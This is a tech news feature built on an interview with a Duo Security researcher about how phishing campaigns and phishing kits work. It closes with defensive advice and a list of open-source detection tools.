How phishers phish

How phishers phish

If you believe the hype, the world’s cyber criminals have huge collections of as-yet-unknown zero-day vulnerabilities hidden away, waiting to unleash on the world.

But Steve Manzuik,  Director of Security Research at Michigan-based security startup Duo Security, says in reality that’s just not the case

“Attackers are pretty lazy, they're not going to do things if they don't have to. If phishing is working, why wouldn't they keep doing it?”


The phishing problem

While the rewards of finding a genuine zero-day vulnerability can be extremely high, that’s because finding them is extremely difficult, and often they only have a limited window of usefulness once used.

“The skill required to play in this field is quite high. The skill required to do a phishing campaign is quite low. You can literally spend six months looking for that million-dollar iPhone bug and not find anything. And there's no point burning any zero days they do have if the phishing is working, so a lot of attackers don't bother playing in this area.”

“We've seen evidence that phishers were watching YouTube videos on how to use the tools right before they launched the phishing campaign. It's literally that easy to do a phishing campaign.”

And phishing is working.

Duo Security’s phishing drills found 44% of emails were opened, and nearly half of those gleaned at least one credential, which is enough to at least start trying to infiltrate a company in the real world. A report from Cofense found 78% of European and 66% of US IT professionals have dealt with a security incident originating from a deceptive email.

Nearly 1.5 million new phishing sites are created each month, and phishing attempts have grown 65% in the last year. According to a new study from Recorded Future, exploits involving Microsoft Office – i.e. the kind you embed into documents and then email to targets – were one of the most popular choices for attackers last year. A successful phishing attack costs a mid-sized enterprise on average around $1.6 million.


The automation and standardization of phishing campaigns

“There was a time it was very easy to spot a phishing email: poor grammar, broken sentences, weird characters in the email, there'd be all kinds of things that would tip you off,” says Manzuik. “whereas today they're good enough that even seasoned security professionals are getting fooled.”

Part of this improvement in campaign quality is down to greater levels of professionalization and cooperation between cybercriminals.

“We’re seeing a lot more formalization in the building of attack methodologies, frameworks, and phishing kits and their sharing them.”

“In the past we would see an attacker build his phishing campaign himself, and they were not very thorough and weren't doing things like encryption or data exfiltration very well. Today we're seeing those methods being cleaned up a lot, we're seeing standard frameworks and methodologies being used.”

Today, however, criminals can launch a whole campaign with just a few clicks.

“The entire process is automated; what the attackers are doing is cloning a legitimate website, adding some PHP code to steal credentials -   and smart attackers will redirect you and log you in to your intended site - they then zip everything together, upload it to a compromised web host, run a script that then blasts out all the emails, and they literally sit back and wait.”

“The reason they're doing this is it lowers your overall time to phish. It's amazingly fast to do this; you're literally cutting and pasting and running one command and uploading a file, and you're done. It takes a few minutes out of their day.”

These kits generally come in a modular form that be constructed as per the individual campaign’s requirements, and even include plug-ins that can be bought and integrated into campaigns; for example, to include encryption. Attacks are also starting to use .htaccess files to block access from security companies' scanners.

This standardization is clearly widespread. An analysis of 66,000 known phishing URLs by Duo found just 3,200 unique phishing kits.

There’s also more intel sharing. If an attacker has collected data – email addresses and company information – for an organization they have no interest in attacking, they may well share that information or sell it to an actor who does want to target that company.


Criminals using social media more, still bad at OpSec

As well as increasing levels of automation, criminals are becoming more sophisticated and patient in their attacks.

“Something we've seen a lot of in the last couple of years is attackers using social media. Sometimes attackers will do something as simple as going on LinkedIn and adding people from a job title – for example Swift administrators.”

“Or sometimes what they do is they'll play the long game and actually set up a lot of fake social media profiles - LinkedIn, Facebook etc. - they'll build friend networks and make profiles look as legitimate as possible.”

In this type of attack, Manzuik says attackers will pick a company and job title for their profile that aligns closely to the target: a business partner or a potential or current customer, and then reach out to gain trust.

In one example, a campaign targeted executives and started asking questions about security posture; ‘We're a partner, we have this security problem, what are you doing to solve this in your company?’

“The executive, thinking he's being helpful, is handing out information, and corresponding with them,” Manzuik explains.

This relationship ended up a malicious link with a key logger being sent and clicked upon but was luckily caught before data could be extracted.

“It was your standard key logger, no zero day, nothing really exotic. The reality was it was a very simple and basic attack. But building the target's trust guarantees higher success in their attack.”

While there is an increasing level of ‘professionalization’ of these attacks, criminals are often guilty of ‘bad OpSec’ and mistakes are still being made. Many criminals don’t delete phishing sites, leaving breadcrumbs for researchers to analyze. Encryption is still not always being used, meaning any kits found online can easily be pulled apart and reverse-engineered. Attackers are leaving easily identifiable information including linked hosts, associated email addresses, and locations of where data is being sent, all of which can be used by companies wanting to know who to defend against.

Manzuik also says there is “no honor among thieves” and criminals, being criminals, often attack their own kind. He has seen hundreds of examples of ‘off the shelf’ phishing kits that include undocumented backdoors which sends a copy of the data being harvested back to the original seller of the kit, as well as the campaign instigator.


Identifying, understanding, and preventing phishing attacks

So, what can you do to prevent, or at least better deal with, phishing attacks? Manzuik recommends a back to basics' approach:

Regular backups, encryption, patching, password managers, multi-factor authentication, and proper account privilege management.

“If you're not doing the basics, your shiny technology's not going to prevent a breach.”

Sites such as PhishTank and OpenPhish provide information on phishing URLs, which when combined with analysis tools such as Savvius or DomainTools, means you can identify and block malicious domains to block from your network.

Duo offers a number of Open Source tools to help spot, report, and analyze phishing attacks:

  • IsThisLegit is a dashboard and Chrome extension that allows Gmail users to send suspected phishing emails to a dashboard
  • Phinn is a Chrome extension that will assess if a log-in pages are legitimate
  • Phish Collect is a Python script which is designed to hunt and analyze phishing kits, allowing you to see if this was a targeted attack towards your company or more of a widespread hit and hope


Also read:
The psychology behind why we fall for social engineering attacks
West African criminals are moving on from Nigerian Prince scams to duping your business
Cyber-criminals are realising there’s plenty to learn from legitimate business
How hackers hack
Does hacking pay?
InfoShot: Hacking doesn’t pay
Security experts talk Ransomware as a Service
Phishing attacks using internationalized domains are hard to block
Q&A: Can machine learning help stop email phishing?
Why DomainTools swapped selling '.coms' for hunting criminals
Savvius goes from Packet Capture to Cyber Forensics in one move
This ‘Google for the Dark web’ helped me check if I’d been hacked


«What design teams can learn from DevOps


Enterprise GitHub projects of the week: Microsoft special»
Dan Swinhoe

Dan is Senior Staff Writer at IDG Connect. Writes about all manner of tech from driverless cars, AI, and Green IT to Cloudy stuff, security, and IoT. Dislikes autoplay ads/videos and garbage written about 'milliennials'.  

  • twt
  • twt
  • Mail

Recommended for You


How a Washington crackdown on Huawei could backfire for everyone

Phil Muncaster reports on China and beyond


5G is over-hyped and expectations need reining in

Dan Swinhoe casts a critical eye on the future


What can we learn from tech initiatives in the Middle East?

Keri Allan looks at the latest trends and technologies

More Like This

Our Case Studies

IDG Connect delivers full creative solutions to meet all your demand generatlon needs. These cover the full scope of options, from customized content and lead delivery through to fully integrated campaigns.


Our Marketing Research

Our in-house analyst and editorial team create a range of insights for the global marketing community. These look at IT buying preferences, the latest soclal media trends and other zeitgeist topics.



Should the government regulate Artificial Intelligence?